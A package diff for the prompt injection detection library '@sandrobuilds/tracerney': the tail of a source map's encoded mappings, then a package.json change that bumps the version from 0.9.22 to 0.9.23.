C;CACF;AAED,+EAA+E;AAC/E,iBAAiB;AACjB,+EAA+E;AAE/E,cAAc;AACd,OAAO,EAAE,gBAAgB,EAAE,CAAC;AAkC5B,6DAA6D;AAC7D,OAAO,EAAE,wBAAwB,EAAE,uBAAuB,EAAE,MAAM,2BAA2B,CAAC;AAG9F,kDAAkD;AAClD,OAAO,EAAE,eAAe,EAAE,gBAAgB,EAAE,MAAM,EAAE,MAAM,qBAAqB,CAAC;AAEhF,OAAO,EAAE,cAAc,EAAE,MAAM,4BAA4B,CAAC;AAG5D,uCAAuC;AACvC,OAAO,EAAE,mBAAmB,EAAE,MAAM,kCAAkC,CAAC;AAEvE,OAAO,EAAE,YAAY,EAAE,MAAM,yBAAyB,CAAC;AAGvD,2BAA2B;AAC3B,OAAO,EAAE,WAAW,EAAE,MAAM,uCAAuC,CAAC;AAGpE,OAAO,EAAE,iBAAiB,EAAE,MAAM,8CAA8C,CAAC;AAGjF,OAAO,EAAE,wBAAwB,EAAE,MAAM,wCAAwC,CAAC"}

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@sandrobuilds/tracerney",
-  "version": "0.9.22",
+  "version": "0.9.23",
   "description": "Lightweight prompt injection detection with Layer 1 (258 patterns) + Layer 2 (AI verification). Runs locally with zero data storage. Upgrade to Pro for context-aware threat analysis at tracerney.com",
   "type": "module",
   "main": "dist/index.js",